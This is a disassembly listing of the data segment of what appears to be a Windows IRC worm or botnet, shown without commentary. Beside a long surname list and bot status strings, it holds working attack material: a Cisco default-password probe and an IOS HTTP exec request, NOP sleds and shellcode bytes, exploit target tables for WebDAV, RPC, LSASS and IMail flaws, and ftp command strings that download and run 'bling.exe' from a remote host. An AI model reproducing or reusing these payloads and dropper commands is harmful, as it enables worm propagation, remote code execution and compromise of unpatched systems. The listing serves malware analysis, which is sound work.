aBradac db 'Bradac',0 ; DATA XREF: seg002:0043C768�o
align 4
aBracalente db 'Bracalente',0 ; DATA XREF: seg002:0043C764�o
align 4
aBoyne db 'Boyne',0 ; DATA XREF: seg002:0043C760�o
align 10h
aBoym db 'Boym',0 ; DATA XREF: seg002:0043C75C�o
align 4
aBoyland db 'Boyland',0 ; DATA XREF: seg002:0043C758�o
aBoyes db 'Boyes',0 ; DATA XREF: seg002:0043C754�o
align 4
aBoyajian db 'Boyajian',0 ; DATA XREF: seg002:0043C750�o
align 4
aBoxer db 'Boxer',0 ; DATA XREF: seg002:0043C74C�o
align 4
aBowers db 'Bowers',0 ; DATA XREF: seg002:0043C748�o
align 4
aBourneuf db 'Bourneuf',0 ; DATA XREF: seg002:0043C744�o
align 10h
aBoudrot db 'Boudrot',0 ; DATA XREF: seg002:0043C740�o
aBoudin db 'Boudin',0 ; DATA XREF: seg002:0043C73C�o
align 10h
aBotosh db 'Botosh',0 ; DATA XREF: seg002:0043C738�o
align 4
aBothman db 'Bothman',0 ; DATA XREF: seg002:0043C734�o
aBossi db 'Bossi',0 ; DATA XREF: seg002:0043C730�o
align 4
aBorden db 'Borden',0 ; DATA XREF: seg002:0043C72C�o
align 10h
aBorack db 'Borack',0 ; DATA XREF: seg002:0043C728�o
align 4
aBoorstin db 'Boorstin',0 ; DATA XREF: seg002:0043C724�o
align 4
aBoone db 'Boone',0 ; DATA XREF: seg002:0043C720�o
align 4
aBookbinder db 'Bookbinder',0 ; DATA XREF: seg002:0043C71C�o
align 4
aBook db 'Book',0 ; DATA XREF: seg002:0043C718�o
align 10h
aBontempo db 'Bontempo',0 ; DATA XREF: seg002:0043C714�o
align 4
aBoniface db 'Boniface',0 ; DATA XREF: seg002:0043C710�o
align 4
aBonham db 'Bonham',0 ; DATA XREF: seg002:0043C70C�o
align 10h
aBoner db 'Boner',0 ; DATA XREF: seg002:0043C708�o
align 4
aBologna db 'Bologna',0 ; DATA XREF: seg002:0043C704�o
aBollinger db 'Bollinger',0 ; DATA XREF: seg002:0043C700�o
align 4
aBolick db 'Bolick',0 ; DATA XREF: seg002:0043C6FC�o
align 4
aBolger db 'Bolger',0 ; DATA XREF: seg002:0043C6F8�o
align 4
aBlyth db 'Blyth',0 ; DATA XREF: seg002:0043C6F4�o
align 4
aBloxham db 'Bloxham',0 ; DATA XREF: seg002:0043C6F0�o
aBloemhof db 'Bloemhof',0 ; DATA XREF: seg002:0043C6EC�o
align 4
aBloembergen db 'Bloembergen',0 ; DATA XREF: seg002:0043C6E8�o
aBloch db 'Bloch',0 ; DATA XREF: seg002:0043C6E4�o
align 4
aBlizard db 'Blizard',0 ; DATA XREF: seg002:0043C6E0�o
aBliss db 'Bliss',0 ; DATA XREF: seg002:0043C6DC�o
align 4
aBlanke db 'Blanke',0 ; DATA XREF: seg002:0043C6D8�o
align 4
aBlakemore db 'Blakemore',0 ; DATA XREF: seg002:0043C6D4�o
align 10h
aBlagg db 'Blagg',0 ; DATA XREF: seg002:0043C6D0�o
align 4
aBlackwell db 'Blackwell',0 ; DATA XREF: seg002:0043C6CC�o
align 4
aBlackbourn db 'Blackbourn',0 ; DATA XREF: seg002:0043C6C8�o
align 10h
aBisho db 'Bisho',0 ; DATA XREF: seg002:0043C6C4�o
align 4
aBisema db 'Bisema',0 ; DATA XREF: seg002:0043C6C0�o
align 10h
aBir db 'Bir',0 ; DATA XREF: seg002:0043C6BC�o
aBinion db 'Binion',0 ; DATA XREF: seg002:0043C6B8�o
align 4
aBickel db 'Bickel',0 ; DATA XREF: seg002:0043C6B4�o
align 4
aBiagioli db 'Biagioli',0 ; DATA XREF: seg002:0043C6B0�o
align 10h
aBeynart db 'Beynart',0 ; DATA XREF: seg002:0043C6AC�o
aBetti db 'Betti',0 ; DATA XREF: seg002:0043C6A8�o
align 10h
aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: seg002:0043C6A4�o
align 10h
aBernston db 'Bernston',0 ; DATA XREF: seg002:0043C6A0�o
align 4
aBernassola db 'Bernassola',0 ; DATA XREF: seg002:0043C69C�o
align 4
aBernardo db 'Bernardo',0 ; DATA XREF: seg002:0043C698�o
align 4
aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: seg002:0043C694�o
align 4
aBergson db 'Bergson',0 ; DATA XREF: seg002:0043C690�o
aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: seg002:0043C68C�o
align 4
aBelloc db 'Belloc',0 ; DATA XREF: seg002:0043C688�o
align 4
aBellini db 'Bellini',0 ; DATA XREF: seg002:0043C684�o
aBellhouse db 'Bellhouse',0 ; DATA XREF: seg002:0043C680�o
align 4
aBellavance db 'Bellavance',0 ; DATA XREF: seg002:0043C67C�o
align 4
aBelinCollart db 'Belin-Collart',0 ; DATA XREF: seg002:0043C678�o
align 4
aBelfer db 'Belfer',0 ; DATA XREF: seg002:0043C674�o
align 4
aBelaoussof db 'Belaoussof',0 ; DATA XREF: seg002:0043C670�o
align 4
aBelanger db 'Belanger',0 ; DATA XREF: seg002:0043C66C�o
align 4
aBehenna db 'Behenna',0 ; DATA XREF: seg002:0043C668�o
aBedford db 'Bedford',0 ; DATA XREF: seg002:0043C664�o
aBeder db 'Beder',0 ; DATA XREF: seg002:0043C660�o
align 4
aBeckman db 'Beckman',0 ; DATA XREF: seg002:0043C65C�o
aBean db 'Bean',0 ; DATA XREF: seg002:0043C658�o
align 4
aBeal db 'Beal',0 ; DATA XREF: seg002:0043C654�o
align 4
aBeacon db 'Beacon',0 ; DATA XREF: seg002:0043C650�o
align 4
aBayo db 'Bayo',0 ; DATA XREF: seg002:0043C64C�o
align 4
aBayles db 'Bayles',0 ; DATA XREF: seg002:0043C648�o
align 4
aBaumiller db 'Baumiller',0 ; DATA XREF: seg002:0043C644�o
align 4
aBatchelder db 'Batchelder',0 ; DATA XREF: seg002:0043C640�o
align 4
aBashevis db 'Bashevis',0 ; DATA XREF: seg002:0043C63C�o
align 10h
aBasavappa db 'Basavappa',0 ; DATA XREF: seg002:0043C638�o
align 4
aBartoo db 'Bartoo',0 ; DATA XREF: seg002:0043C634�o
align 4
aBartolome db 'Bartolome',0 ; DATA XREF: seg002:0043C630�o
align 10h
aBartholomew db 'Bartholomew',0 ; DATA XREF: seg002:0043C62C�o
aBarry db 'Barry',0 ; DATA XREF: seg002:0043C628�o
align 4
aBarriola db 'Barriola',0 ; DATA XREF: seg002:0043C624�o
align 10h
aBarnett db 'Barnett',0 ; DATA XREF: seg002:0043C620�o
aBarneson db 'Barneson',0 ; DATA XREF: seg002:0043C61C�o
align 4
aBarbetti db 'Barbetti',0 ; DATA XREF: seg002:0043C618�o
align 10h
aBarberi db 'Barberi',0 ; DATA XREF: seg002:0043C614�o
aBaranowska db 'Baranowska',0 ; DATA XREF: seg002:0043C610�o
align 4
aBaranczak db 'Baranczak',0 ; DATA XREF: seg002:0043C60C�o
align 10h
aBarajas db 'Barajas',0 ; DATA XREF: seg002:0043C608�o
aBarabesi db 'Barabesi',0 ; DATA XREF: seg002:0043C604�o
align 4
aBanta db 'Banta',0 ; DATA XREF: seg002:0043C600�o
align 4
aBaltz db 'Baltz',0 ; DATA XREF: seg002:0043C5FC�o
align 4
aBallew db 'Ballew',0 ; DATA XREF: seg002:0043C5F8�o
align 4
aBallatori db 'Ballatori',0 ; DATA XREF: seg002:0043C5F4�o
align 4
aBaleja db 'Baleja',0 ; DATA XREF: seg002:0043C5F0�o
align 10h
aBakanowsky db 'Bakanowsky',0 ; DATA XREF: seg002:0043C5EC�o
align 4
aBailar db 'Bailar',0 ; DATA XREF: seg002:0043C5E8�o
align 4
aBagnold db 'Bagnold',0 ; DATA XREF: seg002:0043C5E4�o
aBaglivo db 'Baglivo',0 ; DATA XREF: seg002:0043C5E0�o
aBady db 'Bady',0 ; DATA XREF: seg002:0043C5DC�o
align 4
aBackus db 'Backus',0 ; DATA XREF: seg002:0043C5D8�o
align 4
aBachmuth db 'Bachmuth',0 ; DATA XREF: seg002:0043C5D4�o
align 10h
aAzima db 'Azima',0 ; DATA XREF: seg002:0043C5D0�o
align 4
aAyling db 'Ayling',0 ; DATA XREF: seg002:0043C5CC�o
align 10h
aAykroyd db 'Aykroyd',0 ; DATA XREF: seg002:0043C5C8�o
aAyiemba db 'Ayiemba',0 ; DATA XREF: seg002:0043C5C4�o
aAxworthy db 'Axworthy',0 ; DATA XREF: seg002:0043C5C0�o
align 4
aAxelrod db 'Axelrod',0 ; DATA XREF: seg002:0043C5BC�o
aAurelius db 'Aurelius',0 ; DATA XREF: seg002:0043C5B8�o
align 10h
aAugustus db 'Augustus',0 ; DATA XREF: seg002:0043C5B4�o
align 4
aAtkins db 'Atkins',0 ; DATA XREF: seg002:0043C5B0�o
align 4
aArky db 'Arky',0 ; DATA XREF: seg002:0043C5AC�o
align 4
aArjas db 'Arjas',0 ; DATA XREF: seg002:0043C5A8�o
align 4
aAristotle db 'Aristotle',0 ; DATA XREF: seg002:0043C5A4�o
align 10h
aArellano db 'Arellano',0 ; DATA XREF: seg002:0043C5A0�o
align 4
aArduini db 'Arduini',0 ; DATA XREF: seg002:0043C59C�o
aArbia db 'Arbia',0 ; DATA XREF: seg002:0043C598�o
align 4
aAntos db 'Antos',0 ; DATA XREF: seg002:0043C594�o
align 4
aAnthony db 'Anthony',0 ; DATA XREF: seg002:0043C590�o
aAnsley db 'Ansley',0 ; DATA XREF: seg002:0043C58C�o
align 4
aAnfinrud db 'Anfinrud',0 ; DATA XREF: seg002:0043C588�o
align 10h
aAndron db 'Andron',0 ; DATA XREF: seg002:0043C584�o
align 4
aAndrelus db 'Andrelus',0 ; DATA XREF: seg002:0043C580�o
align 4
aAndo db 'Ando',0 ; DATA XREF: seg002:0043C57C�o
align 4
aAndel db 'Andel',0 ; DATA XREF: seg002:0043C578�o
align 4
aAnand db 'Anand',0 ; DATA XREF: seg002:0043C574�o
align 4
aAmsden db 'Amsden',0 ; DATA XREF: seg002:0043C570�o
align 4
aAmeer db 'Ameer',0 ; DATA XREF: seg002:0043C56C�o
align 4
aAmatangelo db 'Amatangelo',0 ; DATA XREF: seg002:0043C568�o
align 4
aAmaral db 'Amaral',0 ; DATA XREF: seg002:0043C564�o
align 10h
aAltenhofen db 'Altenhofen',0 ; DATA XREF: seg002:0043C560�o
align 4
aAltenberger db 'Altenberger',0 ; DATA XREF: seg002:0043C55C�o
aAltavilla db 'Altavilla',0 ; DATA XREF: seg002:0043C558�o
align 4
aAlongi db 'Alongi',0 ; DATA XREF: seg002:0043C554�o
align 4
aAllison db 'Allison',0 ; DATA XREF: seg002:0043C550�o
aAleks db 'Aleks',0 ; DATA XREF: seg002:0043C54C�o
align 4
aAlda db 'Alda',0 ; DATA XREF: seg002:0043C548�o
align 4
aAlcorn db 'Alcorn',0 ; DATA XREF: seg002:0043C544�o
align 4
aAlavi db 'Alavi',0 ; DATA XREF: seg002:0043C540�o
align 4
aAhlers db 'Ahlers',0 ; DATA XREF: seg002:0043C53C�o
align 4
aAdorno db 'Adorno',0 ; DATA XREF: seg002:0043C538�o
align 4
aAdibe db 'Adibe',0 ; DATA XREF: seg002:0043C534�o
align 4
aAdelstein db 'Adelstein',0 ; DATA XREF: seg002:0043C530�o
align 4
aAddison db 'Addison',0 ; DATA XREF: seg002:0043C52C�o
aAdams db 'Adams',0 ; DATA XREF: seg002:0043C528�o
align 4
aAckerman db 'Ackerman',0 ; DATA XREF: seg002:0043C524�o
align 4
aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: seg002:off_43C520�o
align 10h
aPc db 'PC',0 ; DATA XREF: seg000:0040A935�o
align 4
aS_6 db '%s|',0 ; DATA XREF: seg000:0040A9B5�o
aS_7 db '[%s]|',0
align 10h
a??? db '???',0 ; DATA XREF: sub_41D779:loc_41D81A�o
a2k3 db '2K3',0
aXp_0 db 'XP',0 ; DATA XREF: sub_41D779+8B�o
align 4
a2k db '2K',0 ; DATA XREF: sub_41D779+7C�o
align 10h
aMe_0 db 'ME',0 ; DATA XREF: sub_41D779+68�o
align 4
a98 db '98',0 ; DATA XREF: sub_41D779+59�o
align 4
aNt_0 db 'NT',0 ; DATA XREF: sub_41D779+4A�o
align 4
a95 db '95',0 ; DATA XREF: sub_41D779+39�o
align 10h
aDS db '[%d]%s',0 ; DATA XREF: sub_40AAE6+3A�o
align 4
aM db '[M]',0 ; DATA XREF: sub_40AAE6+2C�o
; sub_40AAE6+51�o
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40AAE6+18�o
; sub_41AD95+6�o
align 4
dword_432844 dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h
; DATA XREF: seg000:0040AF00�o
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40B0BB+51�o
align 10h
aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40B0BB+35�o
align 4
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40B3C5+86�o
align 4
dword_4328AC dd 25370320h, 203A0373h, 2C6425h ; DATA XREF: sub_40B3C5+47�o
unk_4328B8 db 2Dh ; - ; DATA XREF: sub_40B3C5+11�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aExploitStatist db 'Exploit Statistics:',0
unk_4328D8 db 2Dh ; - ; DATA XREF: sub_40B494+37�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
db 54h ; T
db 72h, 61h, 6Eh
db 73h ; s
db 66h, 65h, 72h
db 20h
db 53h, 74h, 61h
db 74h ; t
db 69h, 73h, 74h
db 69h ; i
db 63h, 73h, 3Ah
db 20h
db 2, 54h, 46h
db 54h ; T
db 50h, 2, 3Ah
db 20h
db 25h, 64h, 2Ch
db 20h
db 2, 46h, 54h
db 50h ; P
db 2, 3Ah, 20h
aDTotalDInS_ db '%d, Total %d in %s.',0
unk_432920 db 2Dh ; - ; DATA XREF: sub_40B4FF+21�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aDConnectbackSh db '%d connectback shells in %s.',0
align 4
aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40B553+7E�o
dword_43295C dd 25370320h, 28200373h, 73253403h, 2C2903h ; DATA XREF: sub_40B553+40�o
dword_43296C dd 234032Dh, 6E616373h, 202D0302h, 6C707845h, 2074696Fh
; DATA XREF: sub_40B553+14�o
dd 7473694Ch, 3Ah
unk_432988 db 2Dh ; - ; DATA XREF: sub_40B619+42�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanNotActive_ db 'Scan not active.',0
align 4
unk_4329A8 db 2Dh ; - ; DATA XREF: sub_40B619+2C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aCurrentIpS_ db 'Current IP: %s.',0
unk_4329C4 db 2Dh ; - ; DATA XREF: seg000:0040BB2C�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_33 db ' Failed to start server, error: <%d>.',0
align 4
unk_4329F8 db 2Dh ; - ; DATA XREF: seg000:0040BA16�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aFailedToSta_34 db '- Failed to start server, error: <%d>.',0
unk_432A30 db 2Dh ; - ; DATA XREF: seg000:0040B9B6�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aServerStarte_2 db '- Server started on Port: %d.',0
align 10h
unk_432A60 db 2Dh ; - ; DATA XREF: seg000:0040B8EF�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_35 db 'Failed to start server, error: <%d>.',0
align 4
unk_432A94 db 2Dh ; - ; DATA XREF: seg000:0040B88F�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aServerStarte_3 db 'Server started on Port: %d, File: %s.',0
align 4
dword_432AC8 dd 234032Dh, 70746674h, 2D030264h, 69614620h, 2064656Ch
; DATA XREF: seg000:0040B7C7�o
dd 73206F74h, 74726174h, 72657320h, 2C726576h, 72726520h
dd 203A726Fh, 3E64253Ch, 2Eh, 234032Dh, 6E616373h, 202D0302h
dd 203A5049h, 202C7325h, 74726F50h, 20642520h, 6F207369h
dd 2E6E6570h, 0
dd 234032Dh, 6E616373h, 202D0302h, 203A5049h, 253A7325h
dd 53202C64h, 206E6163h, 65726874h, 203A6461h, 202C6425h
dd 2D627553h, 65726874h, 203A6461h, 2E6425h, 234032Dh
dd 6E616373h, 202D0302h, 696E6946h, 64656873h, 20746120h
dd 253A7325h, 66612064h, 20726574h, 6D206425h, 74756E69h
dd 29732865h, 20666F20h, 6E616373h, 676E696Eh, 2Eh, 234032Dh
dd 6E616373h, 202D0302h, 6C696146h, 74206465h, 7473206Fh
dd 20747261h, 6B726F77h, 74207265h, 61657268h, 65202C64h
dd 726F7272h, 253C203Ah, 2E3E64h, 234032Dh, 6E616373h
dd 202D0302h, 253A7325h, 53202C64h, 206E6163h, 65726874h
dd 203A6461h, 202C6425h, 2D627553h, 65726874h, 203A6461h
dd 2E6425h, 234032Dh, 6E616373h, 202D0302h, 6C696146h
dd 74206465h, 6E69206Fh, 61697469h, 657A696Ch, 69726320h
dd 61636974h, 6573206Ch, 6F697463h, 2E6Eh, 234032Dh, 6C707865h
dd 274696Fh, 66202D03h, 73696E69h, 20646568h, 6C707865h
dd 6974696Fh, 2520676Eh, 25282073h, 74612064h, 706D6574h
dd 297374h, 234032Dh, 6C707865h, 274696Fh, 74202D03h, 6E697972h
dd 25022067h, 6F200273h, 7325206Eh, 6F702820h, 25207472h
dd 2E2E2964h, 2Eh, 234032Dh, 6E616373h, 202D0302h, 203A5049h
dd 50207325h, 3A74726Fh, 20642520h, 6F207369h, 2E6E6570h
dd 0
db 2Dh ; -
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0
align 10h
db 2Dh ; -
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedScanni db 'Finished scanning IP: %s.',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0
align 4
unk_432D48 db 2Dh ; - ; DATA XREF: seg000:0040C6D6�o
db 3, 34h, 2
db 63h ; c
db 69h, 73h, 63h
db 6Fh ; o
db 28h, 74h, 65h
db 6Ch ; l
db 6Eh, 65h, 74h
db 29h ; )
db 3, 2, 2Dh
aFoundRouterS db ' found router: %s',0
align 10h
aUserAccessVeri db 0Dh,0Ah ; DATA XREF: seg000:0040C6B1�o
db 0Dh,0Ah
db 'User Access Verification',0Dh,0Ah
db 0Dh,0Ah
db 'Password',0
align 4
aPass db 0Dh,0Ah ; DATA XREF: seg000:0040C69A�o
db 'Pass',0
align 4
aCisco db 'cisco',0Dh,0 ; DATA XREF: seg000:0040C675�o
align 4
unk_432DAC db 2Dh ; - ; DATA XREF: seg000:0040C83F�o
db 3, 34h, 2
db 63h ; c
db 69h, 73h, 63h
db 6Fh ; o
db 28h, 68h, 74h
db 74h ; t
db 70h, 29h, 3
db 2
aFoundRouterS_0 db '- found router: %s',0
aHttp1_0200Ok db 'HTTP/1.0 200 OK',0 ; DATA XREF: seg000:0040C804�o
aGetLevel16Exec db 'GET /level/16/exec/-///pwd HTTP/1.0',0Ah ; DATA XREF: seg000:0040C7A1�o
db 0Ah,0
align 4
dword_432E08 dd 0 ; DATA XREF: sub_40C89B+9A�o
asc_432E0C: ; DATA XREF: sub_40C89B+17�o
; sub_40C979+17�o
unicode 0, <\\>,0
align 4
off_432E14 dd offset dword_49005C ; DATA XREF: sub_40C89B+C�o
; sub_40C979+C�o
dd offset aWarshafsky+4
dd 24h
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: seg000:0040CC88�o
align 4
aThcownziis db 'THCOWNZIIS!',0 ; DATA XREF: seg000:0040CF5E�o
dword_432E40 dd 0FEBh ; DATA XREF: seg000:0040CF53�o
aBling_exe db 'bling.exe',0Dh,0Ah,0 ; DATA XREF: sub_40D055+85�o
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: sub_40D055+42�o
db 'echo quit >> o &ftp -n -s:o',0Dh,0Ah,0
align 10h
a7_0 db '7.0',0 ; DATA XREF: seg000:0040D7CF�o
a6_0 db '6.0',0 ; DATA XREF: seg000:0040D7BE�o
a5_0 db '5.0',0 ; DATA XREF: seg000:0040D7AD�o
a4_0 db '4.0',0 ; DATA XREF: seg000:0040D79C�o
aHotfix2 db 'hotfix2',0 ; DATA XREF: seg000:loc_40D78B�o
a8_15 db '8.15',0 ; DATA XREF: seg000:loc_40D75E�o
align 10h
a8_14 db '8.14',0 ; DATA XREF: seg000:loc_40D604�o
align 4
a8_13 db '8.13',0 ; DATA XREF: seg000:loc_40D5DA�o
align 10h
a8_12 db '8.12',0 ; DATA XREF: seg000:loc_40D5B0�o
align 4
a8_11 db '8.11',0 ; DATA XREF: seg000:loc_40D583�o
align 10h
a8_10 db '8.10',0 ; DATA XREF: seg000:loc_40D556�o
align 4
a8_05 db '8.05',0 ; DATA XREF: seg000:loc_40D529�o
align 10h
a8_04 db '8.04',0 ; DATA XREF: seg000:loc_40D4FC�o
align 4
a8_03 db '8.03',0 ; DATA XREF: seg000:loc_40D4CF�o
align 10h
a8_02 db '8.02',0 ; DATA XREF: seg000:loc_40D4A2�o
align 4
a8_01 db '8.01',0 ; DATA XREF: seg000:loc_40D475�o
align 10h
a8_00 db '8.00',0 ; DATA XREF: seg000:loc_40D448�o
align 4
a7_15 db '7.15',0 ; DATA XREF: seg000:loc_40D41B�o
align 10h
a7_14 db '7.14',0 ; DATA XREF: seg000:0040D3EE�o
align 4
a7_13 db '7.13',0 ; DATA XREF: seg000:loc_40D3DD�o
align 10h
a7_12 db '7.12',0 ; DATA XREF: seg000:loc_40D3B0�o
align 4
a7_11 db '7.11',0 ; DATA XREF: seg000:0040D383�o
align 10h
a7_10 db '7.10',0 ; DATA XREF: seg000:loc_40D372�o
align 4
a7_07 db '7.07',0 ; DATA XREF: seg000:0040D348�o
align 10h
a7_06 db '7.06',0 ; DATA XREF: seg000:loc_40D337�o
align 4
a7_05 db '7.05',0 ; DATA XREF: seg000:loc_40D30D�o
align 10h
a7_04 db '7.04',0 ; DATA XREF: seg000:0040D2DB�o
align 4
aImail db 'IMail',0 ; DATA XREF: seg000:0040D2C1�o
; seg000:loc_40D7DE�o
align 10h
dword_432F80 dd 6EB06EBh, 0 ; DATA XREF: sub_40D7FE+17A�o
; sub_40DDD9+1A2�o
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40D7FE+27�o
; sub_40DDD9+27�o ...
align 4
dword_432F94 dd 1CEC8166h ; DATA XREF: sub_40D7FE+D�r
; sub_40DDD9+D�r
dword_432F98 dd 0E4FF07h ; DATA XREF: sub_40D7FE+16�r
; sub_40DDD9+16�r
aMsgBodySizeD db '[*] Msg body size: %d',0Ah,0 ; DATA XREF: sub_40E3B2+177�o
align 4
aMessage db '*** MESSAGE ***',0 ; DATA XREF: sub_40E3B2+51�o
dword_432FC4 dd 90909090h, 909010EBh, 90909090h, 0 ; DATA XREF: sub_40E3B2+42�o
dword_432FD4 dd 90909090h, 5803EB90h, 0F8E805EBh, 0B9FFFFFFh, 0FFFFFFFFh
; DATA XREF: sub_40E3B2+35�o
dd 0EE7FE981h, 0C12BFFFFh, 0E0FFh
aAdik db 'ADIK',0 ; DATA XREF: sub_40E3B2+28�o
align 4
aNetmaniac db 'NETMANIAC',0 ; DATA XREF: sub_40E3B2+1C�o
align 4
dword_433008 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_40E3B2+10�o
dd 0FFFFFFFFh, 0
aWindowsXpSp1En db 'Windows XP SP 1 (en)',0 ; DATA XREF: seg000:0040E5D0�o
align 10h
aWindows2000Sp3 db 'Windows 2000 SP 3 (en)',0 ; DATA XREF: seg000:0040E5A9�o
align 4
asc_433048: ; DATA XREF: sub_40E971+31E�o
unicode 0, <`>,0
dword_43304C dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40E971+2F2�o
dword_433058 dd 30h ; DATA XREF: sub_40E971+2C6�o
dword_43305C dd 0A1h ; DATA XREF: sub_40E971+29A�o
dword_433060 dd 3 ; DATA XREF: sub_40E971+243�o
aCccc db 'CCCC',0 ; DATA XREF: sub_40E971+14B�o
align 4
dword_43306C dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_40E971+E0�o
dbl_433078 dq 1.388888888888889e-2 ; DATA XREF: sub_40EEBD+3A�r
dbl_433080 dq 1.666666666666667e-1 ; DATA XREF: sub_40EEBD:loc_40EED8�r
dbl_433088 dq 4.294967296e9 ; DATA XREF: sub_40EEBD+15�r
; sub_40EEBD+30�r ...
dbl_433090 dq 1.333333333333333 ; DATA XREF: sub_40F47A:loc_40F4F1�r
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40F5F6+63�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 8
aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: seg000:0040F728�o
db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0
align 4
aAdmin db 'admin$',0 ; DATA XREF: sub_40F87A+3D�o
align 4
asc_433144: ; DATA XREF: sub_40F87A+32�o
; seg000:00414B48�o
unicode 0, <\>,0
asc_433148 db '\\',0 ; DATA XREF: sub_40F87A+19�o
align 4
a8a885d041ceb11 db '8a885d04-1ceb-11c9-9fe8-08002b104860',0 ; DATA XREF: sub_40FA56+C�o
align 4
aFdb3a030065f11 db 'fdb3a030-065f-11d1-bb9b-00a024ea5525',0 ; DATA XREF: seg000:0040FB79�o
align 4
unk_43319C db 2Dh ; - ; DATA XREF: sub_40FDC3+211�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 62h
db 69h ; i
db 6Fh, 73h, 3
db 2
aExploitingIpSS db '- Exploiting IP: %s, Share: \%s, User: (%s/%s)',0
aNoPassword db '(no password)',0 ; DATA XREF: sub_40FDC3+1EA�o
align 4
aSSS_2 db '%s\%s\%s',0 ; DATA XREF: sub_40FDC3+CA�o
align 4
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: sub_40FDC3+71�o
aCWinntSystem32 db 'c$\winnt\system32',0 ; DATA XREF: sub_40FDC3+6A�o
align 4
aAdminSystem32 db 'Admin$\system32',0 ; DATA XREF: sub_40FDC3+63�o
aSIpc_0 db '%s\ipc$',0 ; DATA XREF: seg000:00410101�o
aS_1 db '\\%s',0 ; DATA XREF: seg000:004100C3�o
; seg000:0041105B�o
align 4
aSPipeLsarpc db '\\%s\pipe\lsarpc',0 ; DATA XREF: seg000:004105C6�o
align 10h
aSIpc_1 db '\\%s\IPC$',0 ; DATA XREF: seg000:00410818�o
align 4
aSD_1 db '%s%d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aSearchSHttp1_1 db 'SEARCH /%s HTTP/1.1',0Dh,0Ah
db 'Host: %s',0Dh,0Ah
db 'Content-type: text/xml',0Dh,0Ah
db 'Content-Length: ',0
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
aWin2kSp0FromPh db 'Win2K SP0 From PhaTTy 1',0
aWin2kSp1FromPh db 'Win2K SP1 From PhaTTy 2',0
aWin2kSp2FromPh db 'Win2K SP2 From PhaTTy 1',0
aWin2kSp3FromPh db 'Win2K SP3 From PhaTTy 1',0
aWin2kSp4FromPh db 'Win2K SP4 From PhaTTy 3',0
aWin2kSp4From_0 db 'Win2K SP4 From PhaTTy 2',0
aWin2kSp1From_0 db 'Win2K SP1 From PhaTTy 1',0
aWin2kSp4From_1 db 'Win2K SP4 From PhaTTy 1',0
aDosXpAll db 'DoS XP ALL',0
align 4
aWindowsUk2k3Ee db 'Windows uk 2k3 ee sp0 24',0
align 10h
aWindowsUk2k3_0 db 'Windows uk 2k3 ee sp0 23',0
align 4
aWindowsUk2k3_1 db 'Windows uk 2k3 ee sp0 22',0
align 4
aWindowsUk2k3_2 db 'Windows uk 2k3 ee sp0 21',0
align 4
aWindowsUk2k3_3 db 'Windows uk 2k3 ee sp0 20',0
align 10h
aWindowsUk2k3_4 db 'Windows uk 2k3 ee sp0 19',0
align 4
aWindowsUk2k3_5 db 'Windows uk 2k3 ee sp0 18',0
align 4
aWindowsUk2k3_6 db 'Windows uk 2k3 ee sp0 17',0
align 4
aWindowsUk2k3_7 db 'Windows uk 2k3 ee sp0 16',0
align 10h
aWindowsUk2k3_8 db 'Windows uk 2k3 ee sp0 15',0
align 4
